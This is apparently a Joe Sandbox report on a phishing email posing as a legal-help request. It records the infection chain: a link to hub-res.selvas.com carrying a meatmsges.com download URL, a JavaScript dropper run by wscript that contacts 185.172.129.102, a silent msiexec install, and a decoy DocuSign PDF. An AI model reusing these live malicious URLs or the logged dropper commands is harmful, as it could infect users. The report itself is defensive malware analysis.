Edit tour

Windows Analysis Report
Seeking Assistance for Legal Assistance in a Medical Matter.msg

Overview

General Information

Sample name:	Seeking Assistance for Legal Assistance in a Medical Matter.msg
Analysis ID:	1523622
MD5:	2cf1168765d32bfeabdba8692c734e70
SHA1:	98c343eba029ba8bcbf4721e4fc2ece5e8572b3d
SHA256:	b7f0263d4086be9bbe1e5bc8ba92ac32642b0e0fa0cf580b2f8c64ce5f080f20
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

System process connects to network (likely due to code injection or exploit)

AI detected landing page (webpage, office document or email)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Checks for available system drives (often done to infect USB drives)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious MsiExec Embedding Parent

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 4868 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Seeking Assistance for Legal Assistance in a Medical Matter.msg" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 7132 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A097B26C-17A0-4E1D-A708-543B440C2DF7" "3869A011-8FB8-4BD0-8197-B311190221AE" "4868" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.com/v3/__http:/hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https:**Ameatmsges.com__;Ly8!!HOHAxFA!VcGeDKmsfWMmpgiczkE2C50slN-Hw5GiQOAVWf2PymTSe6F4ylwVebwl882vHrUIqRx7-X8g7MyiP2dsxGEV925K2yY$ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1956,i,16699834645049237622,13361007612936860646,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

rundll32.exe (PID: 8156 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

OpenWith.exe (PID: 5756 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

wscript.exe (PID: 1552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

msiexec.exe (PID: 636 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\setup.msi" /qn MD5: E5DA170027542E25EDE42FC54C929077)

wscript.exe (PID: 7872 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

msiexec.exe (PID: 6220 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 1344 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EEBE48B0ACB6169BD1EAED2E2D23330D MD5: 9D09DC1EDA745A5F87553048E57620CF)

expand.exe (PID: 1956 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2604 cmdline: "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 7904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 185.172.129.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1552, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49723

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\OpenWith.exe -Embedding, ParentImage: C:\Windows\System32\OpenWith.exe, ParentProcessId: 5756, ParentProcessName: OpenWith.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , ProcessId: 1552, ProcessName: wscript.exe

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 4868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.172.129.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1552, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49723

Sigma detected: Suspicious MsiExec Embedding Parent

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf, CommandLine: "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding EEBE48B0ACB6169BD1EAED2E2D23330D, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1344, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf, ProcessId: 2604, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\OpenWith.exe -Embedding, ParentImage: C:\Windows\System32\OpenWith.exe, ParentProcessId: 5756, ParentProcessName: OpenWith.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js" , ProcessId: 1552, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp

ReversingLabs: Detection: 23%

Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.172.129.102:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.172.129.102:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.16:49733 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.172.129.102 443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.68
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56

Source: global traffic

HTTP traffic detected: GET /market/fatalraid/zh-HK/hub.html?download_url=https://meatmsges.com HTTP/1.1Host: hub-res.selvas.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: urldefense.com
Source: global traffic	DNS traffic detected: DNS query: hub-res.selvas.com
Source: global traffic	DNS traffic detected: DNS query: meatmsges.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.docusign.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.172.129.102:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.172.129.102:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.16:49733 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\528ed3.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{01B6AE88-3941-4499-8E11-12D792751092}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI900C.tmp

Source: classification engine

Classification label: mal72.evad.winMSG@37/29@16/87

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241001T1511290258-4868.etl

Source: C:\Windows\System32\OpenWith.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Seeking Assistance for Legal Assistance in a Medical Matter.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A097B26C-17A0-4E1D-A708-543B440C2DF7" "3869A011-8FB8-4BD0-8197-B311190221AE" "4868" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.com/v3/__http:/hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https:**Ameatmsges.com__;Ly8!!HOHAxFA!VcGeDKmsfWMmpgiczkE2C50slN-Hw5GiQOAVWf2PymTSe6F4ylwVebwl882vHrUIqRx7-X8g7MyiP2dsxGEV925K2yY$
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1956,i,16699834645049237622,13361007612936860646,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A097B26C-17A0-4E1D-A708-543B440C2DF7" "3869A011-8FB8-4BD0-8197-B311190221AE" "4868" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.com/v3/__http:/hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https:**Ameatmsges.com__;Ly8!!HOHAxFA!VcGeDKmsfWMmpgiczkE2C50slN-Hw5GiQOAVWf2PymTSe6F4ylwVebwl882vHrUIqRx7-X8g7MyiP2dsxGEV925K2yY$
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1956,i,16699834645049237622,13361007612936860646,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js"
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\setup.msi" /qn
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EEBE48B0ACB6169BD1EAED2E2D23330D
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\setup.msi" /qn
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EEBE48B0ACB6169BD1EAED2E2D23330D
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: msasn1.dll
